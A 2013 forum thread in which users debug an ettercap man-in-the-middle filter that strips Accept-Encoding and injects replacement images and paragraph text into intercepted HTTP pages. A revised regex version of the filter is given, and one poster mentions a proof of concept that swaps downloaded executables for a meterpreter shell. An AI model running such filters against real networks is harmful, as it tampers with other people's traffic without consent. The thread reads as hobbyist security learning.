ÖVèЯRÍđễ Posted January 13, 2013 Share Posted January 13, 2013 I have a ettercap filter which I modified, It is used to change pictures on a web page, but I wanted it to change paragraph text aswell. It changes the pictures but not the text. Here is the script. ############################################################################ # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & NaGA # # Along with some help from Kev and jon.dmml # # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("<p>", "<p>Text I want to display</p>"); replace("<P>", "<P>Test I want to display</P>"); } So my question is, what have I done wrong on the 2nd from bottom line and 3rd from bottom line? Thanks. Quote Link to comment Share on other sites More sharing options...
no42 Posted January 13, 2013 Share Posted January 13, 2013 (edited) Are you getting any errors? Have you tried this, if so is the page source available? Basically, its replacing <p> with <p>my text .... if there is no <p> tag, it wont do the replace http://www.irongeek.com/i.php?page=backtrack-3-man/etterfilter Edited January 13, 2013 by midnitesnake Quote Link to comment Share on other sites More sharing options...
ÖVèЯRÍđễ Posted January 13, 2013 Author Share Posted January 13, 2013 Actually I was slightly wrong. It only replaces empty <p> tags. Would there be any way of replacing tags with text in? Maybe by using a wildcard e.g <p>*</p> Quote Link to comment Share on other sites More sharing options...
i8igmac Posted January 17, 2013 Share Posted January 17, 2013 From Droid... There are a few steps you may have to take. Maybe set uid in ettercap config. Enable ipfarwording per iptables or ipchains os specific. These 2 above would help u Google search Content-length also plays a big part when moding data, always try something simple like replace(poo for pee) Try several webpages during your test msn, yahoo etc... Not https... I have some proof of concept I wrote in ruby, when a user downloads a executable during mitm, the binary data is replaced with a meterpreter shell https://vimeo.com/51230425 Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted March 5, 2013 Share Posted March 5, 2013 Can anyone make a tutorial to use this filter on ettercap module? Quote Link to comment Share on other sites More sharing options...
madviperseven Posted March 12, 2013 Share Posted March 12, 2013 (edited) I have a ettercap filter which I modified, It is used to change pictures on a web page, but I wanted it to change paragraph text aswell. It changes the pictures but not the text. Here is the script. ############################################################################ # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & NaGA # # Along with some help from Kev and jon.dmml # # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("<p>", "<p>Text I want to display</p>"); replace("<P>", "<P>Test I want to display</P>"); } So my question is, what have I done wrong on the 2nd from bottom line and 3rd from bottom line? Thanks. I'm not familiar with ettercap filters, but it would appear that your code should produce: <p>Text I want to display</p>[ORIGINAL TEXT]</p> Firstly, all your code does is replace the <p> tag with your desired text. It does not replace the content or the closing tag. Here's a link to the etterfilter manpage: http://linux.die.net/man/8/etterfilter Try using the pcre_regex() function instead. Edited March 12, 2013 by madviperseven Quote Link to comment Share on other sites More sharing options...
madviperseven Posted March 12, 2013 Share Posted March 12, 2013 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); #replace("<p>", "<p>Text I want to display</p>"); #replace("<P>", "<P>Test I want to display</P>"); pcre_regex(DATA.data, "\<[pP]\>.*<\/[pP]\>", "\Q<p>Text I want to display</p>\E"); } Maybe something like this... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.